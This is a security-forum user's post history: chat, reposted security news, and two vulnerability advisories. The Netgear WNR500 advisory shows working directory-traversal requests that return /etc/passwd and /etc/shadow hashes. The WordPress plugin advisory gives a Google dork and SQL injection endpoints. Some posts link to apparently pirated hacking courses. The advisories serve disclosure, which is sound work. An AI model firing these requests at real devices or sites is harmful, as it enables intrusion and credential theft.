-
Posts
3453 -
Days Won
22
Everything posted by Aerosol
-
eMAG becomes "Santa Claus": it mistakenly sold products for 1 leu.
Aerosol replied to TheOne's topic in Stiri securitate
Man, they don't give a damn about the losses, because they got free advertising; it was just a strategy to fool the public. "Look, bro, even after getting it wrong they honor their orders, that's how it's done, let me order too." Bro, they won't end up at a loss, relax.
-
Cheers @io.kent, I hope the "colored ones" don't change the password...
-
eMAG becomes "Santa Claus": it mistakenly sold products for 1 leu.
Aerosol replied to TheOne's topic in Stiri securitate
Then you didn't look closely, they really did have the problem. Damn, couldn't I have grabbed a laptop for 4 lei too. Anyway, this whole thing was a marketing strategy and nothing else. An error? Who believes that?
-
Worst WordPress hole for five years affects 86% of sites
Aerosol replied to Nytro's topic in Stiri securitate
That site isn't mine, bro... it's a friend's site...
-
LOL, dude, the way this video is edited it only shows his bad side (well, here I'm not sure whether he has a good side too) "Let all the girls shake their bellies."
-
Worst WordPress hole for five years affects 86% of sites
Aerosol replied to Nytro's topic in Stiri securitate
The most vulnerable platform. I'm curious, Joomla or WordPress, which one is crappier...
-
@zachary1337 Send free SMS in Romania, this one doesn't insert its source, not all sites are the same.
-
You have user+pass, you have the link, and those IPs + port are proxies, you'll manage...
-
@misefalfaie Free SMS Italy
-
@Nytro Anyway, these guys are getting more and more inventive
-
Send free SMS, I use it (you have to log in with your Facebook account, you can just pick an account made out of boredom, account age, posts etc. don't matter...)
-
I chose to have it delivered to the customs post office because I was nearby
-
Learn The Basics of Ethical Hacking in Easy Steps [udemy]
Here is a course of Ethical Hacking and Pentest.
How to Download File From Dogefile
Credits to: Altair
Real Price: 499
5 Lesson Total.
Download: Section 1 Section 2 Section 3 Section 4 Section 5 Section 6 Section 7 Section 8 Section 9
==========================================
SQL Injection Master Course [udemy]
- Real Price: $300
Credits to: Altair
- 43 Lecture Total
Download
-
Penetration Testing and Hacking Video Tutorials Collection
Aerosol posted a topic in Tutoriale video
Credits to D30N3
Download Link: 788 MB Download file for free
Password: onevatan.com
-
Paypal has closed a remote code execution vulnerability in its service some 18 months after it was reported.

The flaws reported earlier this month rated critical by Vulnerability Lab affected a core Paypal profile application. Kunz Mejr also found a filter bypass and persistent bug during his penetration test in the same vulnerable parameter location. He said attackers with a user account in hand could load script and remotely execute arbitrary code to access local web-server files and configurations.

Exploitation of the system specific code execution vulnerability required only a low privileged Paypal account with restricted access and did not need user interaction. Attackers could include a frame with a local request through trusted context to capture unauthorised system data and could deploy webshell injects during the execution point of the Paypal user's profile, he said.

Paypal was notified in April 2013 and engaged in feedback until a patch was issued 25 October this year and an unspecified reward issued through eBay's bug bounty program.

The bug was the second recently disclosed by Vulnerability Lab in Paypal. Researcher Ateeq Khan reported a medium severity flaw in Paypal's shipping service that could allow an attacker to inject malicious code into a form to target users.

Source
-
When you ask whether it would work, do you mean whether it would be "popular"? It depends on a great many factors: complexity, design, how well it satisfies users' needs, how it performs. If you mean making money from the premium version, it will be rather hard at first.
-
A friend is actually looking for it
-
aaaa, shipping for the watch is $3, but if you take more (3, 4 etc... it gets discounted to $2)
-
@indianul I think that if he managed to hide for 5 years he'll manage to hide for another 10, and that way interest will fade... As for the part about the friend, would you really trust someone to return that money to you? )
-
Hey there, if you want to stick around here it would be good to read the rules
-
Security researchers have discovered a new type of "Man-in-the-Middle" (MitM) attack in the wild targeting smartphone and tablet users on devices running either iOS or Android around the world.

The MitM attack, dubbed DoubleDirect, enables an attacker to redirect a victim’s traffic of major websites such as Google, Facebook and Twitter to a device controlled by the attacker. Once done, cyber crooks can steal victims’ valuable personal data, such as email IDs, login credentials and banking information, and can deliver malware to the targeted mobile device.

San Francisco-based mobile security firm Zimperium detailed the threat in a Thursday blog post, revealing that the DoubleDirect technique is being used by attackers in the wild in attacks against the users of web giants including Google, Facebook, Hotmail, Live.com and Twitter, across 31 countries, including the U.S., the U.K. and Canada.

DoubleDirect makes use of ICMP (Internet Control Message Protocol) redirect packets in order to change the routing tables of a host — used by routers to announce to a machine a better route for a certain destination.

In addition to iOS and Android devices, DoubleDirect potentially targets Mac OSX users as well. However, users of Windows and Linux are immune to the attack because their operating systems don't accept ICMP re-direction packets that carry the malicious traffic.

The security firm tested the attack and it works on the latest versions of iOS, including version 8.1.1; most Android devices, including Nexus 5 and Lollipop; and also on OS X Yosemite. The firm also showed users how to manually disable ICMP Redirect on their Macs to remediate the issue.

The company has provided a complete Proof-of-Concept (PoC) for the DoubleDirect Attack; users can download it from the web. It demonstrates the possibility of a full-duplex ICMP redirect attack by predicting the IP addresses the victim tries to connect to, by sniffing the DNS traffic of the target; the next step consists of sending an ICMP redirect packet to all IP addresses.

Source
-
Researchers have discovered a group of attackers who have published a variety of compromised WordPress themes and plug-ins on legitimate-looking sites, tricking developers into downloading and installing them on their own sites. The components then give the attackers remote control of the compromised sites and researchers say the attack may have been ongoing since September 2013.

The incident came to light through an investigation by researchers at Fox-IT in the Netherlands, who discovered it after noticing a compromised Joomla plug-in on a customer’s site. After a little investigation, they discovered that the plug-in had been downloaded from a site that offers a list of pirated themes and plug-ins.

CryptoPHP is the name the researchers have given to the malware that’s delivered with the compromised components, and the backdoor has a number of capabilities. It carries with it several hardcoded domains for command-and-control communications and uses RSA encryption to protect its communications with the C2 servers. Some versions also have a backup ability to communicate over email if the C2 domains are taken down.

The PHPCrypto malware can update itself, inject content into the compromised sites it sits on and perform several other functions. But the main purpose of the malware is to conduct blackhat SEO operations. The goal of these campaigns is to jack up the rank of sites controlled by the attackers, or their customers, which helps them look legitimate. This is done sometimes for gambling sites or similar sites and can also be tied to other scams.

The researchers have traced the attack to an IP address in Moldova, and the C2 servers are located in the Netherlands, Germany, Poland and the United States. Fox-IT said that they have identified thousands of plug-ins that have been backdoored, including both WordPress and Joomla plug-ins and themes and Drupal themes.

Source
-
Netgear Wireless Router WNR500 Parameter Traversal Arbitrary File Access Exploit

Vendor: NETGEAR
Product web page: http://www.netgear.com
Affected version: WNR500 (firmware: 1.0.7.2)

Summary: The NETGEAR compact N150 classic wireless router (WNR500) improves your legacy Wireless-G network. It is a simple, secure way to share your Internet connection and allows you to easily surf the Internet, use email, and have online chats. The quick, CD-less setup can be done through a web browser. The small, efficient design fits perfectly into your home.

Desc: The router suffers from an authenticated file inclusion vulnerability (LFI) when input passed thru the 'getpage' parameter to 'webproc' script is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks.

Tested on: mini_httpd/1.19 19dec2003

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2014-5208
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5208.php

16.11.2014

--

= 1 =============================================================

GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive

---

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=7dc3268b;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;

#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh

= 2 =============================================================

GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive

---

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=7dc3268b;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;

#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

Source
-
Vulnerability title: Multiple SQL Injection in SP Client Document Manager plugin
Plugin: SP Client Document Manager
Vendor: http://smartypantsplugins.com
Product: https://wordpress.org/plugins/sp-client-document-manager/
Affected version: version 2.4.1 and previous version
Fixed version: N/A
Google dork: inurl:wp-content/plugins/sp-client-document-manager
Reported by: Dang Quoc Thai - thai.q.dang (at) itas (dot) vn
Credits to ITAS Team - www.itas.vn

::DESCRIPTION::

Multiple SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URL and parameter has been confirmed to suffer from SQL injection:

Link 1:

POST /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=email-vendor HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/wordpress/?page_id=16
Cookie: wordpress_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7Cc493b6c21a4a1916e2bc6076600939af5276b6feb09d06ecc043c37bd92a0748; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7C7995fe13b1bbe0761cb05258e4e13b20b27cc9cedf3bc337440672353309e8a3; bp-activity-oldestpage=1
Connection: keep-alive
Content-Length: 33
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

vendor_email[]=<SQL Injection>

Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1516 -> 1530)

function email_vendor()
{
    global $wpdb, $current_user;
    if (count($_POST['vendor_email']) == 0) {
        echo '<p style="color:red;font-weight:bold">' . __("Please select at least one file!", "sp-cdm") . '</p>';
    } else {
        $files = implode(",", $_POST['vendor_email']);
        echo "SELECT * FROM " . $wpdb->prefix . "sp_cu WHERE id IN (" . $files . ")"."\n";
        $r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu WHERE id IN (" . $files . ")", ARRAY_A);

Link 2: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection>

GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive

Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1462 -> 1479)

function download_project()
{
    global $wpdb, $current_user;
    $user_ID = $_GET['id'];
    $r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu where pid = $user_ID order by date desc", ARRAY_A);
    $r_project = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu_project where id = $user_ID ", ARRAY_A);
    $return_file = "" . preg_replace('/[^\w\d_ -]/si', '', stripslashes($r_project[0]['name'])) . ".zip";
    $zip = new Zip();
    $dir = '' . SP_CDM_UPLOADS_DIR . '' . $r_project[0]['uid'] . '/';
    $path = '' . SP_CDM_UPLOADS_DIR_URL . '' . $r_project[0]['uid'] . '/';
    //@unlink($dir.$return_file);
    for ($i = 0; $i < count($r); $i++) {
        $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
    }
    $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
    $zip->setZipFile($dir . $return_file);
    header("Location: " . $path . $return_file . "");
}

Link 3: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection>

GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive

Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)

function download_archive()
{
    global $wpdb, $current_user;
    $user_ID = $_GET['id'];
    $dir = '' . SP_CDM_UPLOADS_DIR . '' . $user_ID . '/';
    $path = '' . SP_CDM_UPLOADS_DIR_URL . '' . $user_ID . '/';
    $return_file = "Account.zip";
    $zip = new Zip();
    $r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu where uid = $user_ID order by date desc", ARRAY_A);
    //@unlink($dir.$return_file);
    for ($i = 0; $i < count($r); $i++) {
        $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
    }
    $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
    $zip->setZipFile($dir . $return_file);
    header("Location: " . $path . $return_file . "");
}

Link 4: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection>

GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive

Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 368 -> 372)

function remove_cat()
{
    global $wpdb, $current_user;
    $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_REQUEST['id'] . " ");
    $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu WHERE pid = " . $_REQUEST['id'] . " ");
}

::DISCLOSURE::

+ 10/30/2014: Notify to vendor - vendor does not respond
+ 11/08/2014: Notify to vendor - Vendor blocks IPs from Vietnam
+ 11/05/2014: Notify to vendor - vendor does not respond
+ 11/20/2014: Public information

::REFERENCE::

https://www.youtube.com/watch?v=AR3xCcuEJHc

Source
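The IN (...) concatenation from email_vendor() in the advisory above, next to a hardened form, as an added example that is not the plugin's code or a vendor fix. PDO with in-memory SQLite stands in for $wpdb so the script runs outside WordPress; the table rows, the function names files_concat and files_bound, and the sample input are constructed. Inside WordPress the same fix is written with $wpdb->prepare() and one %d placeholder per validated element.

```php
<?php
// Added example, not the plugin's code. PDO + in-memory SQLite stand in for
// WordPress's $wpdb; the table contents below are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE wp_sp_cu (id INTEGER PRIMARY KEY, uid INTEGER, file TEXT)');
$db->exec("INSERT INTO wp_sp_cu (id, uid, file) VALUES
    (1, 10, 'invoice.pdf'), (2, 10, 'contract.pdf'), (3, 99, 'other-client.pdf')");

// Same pattern as email_vendor() in the advisory: request values are
// imploded straight into the IN (...) list.
function files_concat(PDO $db, array $ids): array
{
    $sql = 'SELECT file FROM wp_sp_cu WHERE id IN (' . implode(',', $ids) . ')';
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: every element must be a positive integer, and the values
// are bound to placeholders instead of being pasted into the SQL text.
function files_bound(PDO $db, $ids): array
{
    if (!is_array($ids) || $ids === []) {
        return [];
    }
    $clean = [];
    foreach ($ids as $id) {
        $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($n === false) {
            throw new InvalidArgumentException('id must be a positive integer');
        }
        $clean[] = $n;
    }
    $marks = implode(',', array_fill(0, count($clean), '?'));
    $stmt = $db->prepare("SELECT file FROM wp_sp_cu WHERE id IN ($marks)");
    foreach ($clean as $i => $n) {
        $stmt->bindValue($i + 1, $n, PDO::PARAM_INT); // positional, 1-based
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed input: the second element is not a number, so it changes the
// meaning of the concatenated query.
$input = ['1', '2) OR (1=1'];

echo 'concatenated: ', implode(', ', files_concat($db, $input)), PHP_EOL;
try {
    files_bound($db, $input);
} catch (InvalidArgumentException $e) {
    echo 'bound: rejected (', $e->getMessage(), ')', PHP_EOL;
}
echo 'bound, valid ids: ', implode(', ', files_bound($db, ['1', '2'])), PHP_EOL;
```

The single-value handlers (download_project, download_archive, remove_cat) need the same integer check and binding, plus a check that the requested id belongs to the logged-in user, since the advisory reports them reachable anonymously.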
-
A hacker group by the name of DerpTrolling claims to have hacked the PlayStation Network, Windows Live, and 2K Games Studios platforms, posting many of the username/password combinations on Pastebin to prove it.

According to CNET, the Pastebin link includes usernames and passwords for 2,131 PlayStation Network users, 1,473 Windows Live users, and 2,000 2k Game Studios users. The hacking group had previously said it didn’t want to leak customer data, but explained why it changed its mind in the Pastebin document.

We will just leave this here. http://t.co/MjN4mEmKNj
— DERP (@GabenTheLord) November 20, 2014

The DerpTrolling group insists it wants to force these major gaming companies — Sony, Microsoft, and 2K — into upgrading their servers to prevent this type of hacking, but in case those companies don’t get the message, DerpTrolling claims to have even more data.

We’ve reached out to Microsoft, Sony, and 2K, and we’ll update this story as soon as we learn more. As we wait for official word from these companies, we strongly advise any users of these platforms change the passwords associated with their accounts.

Source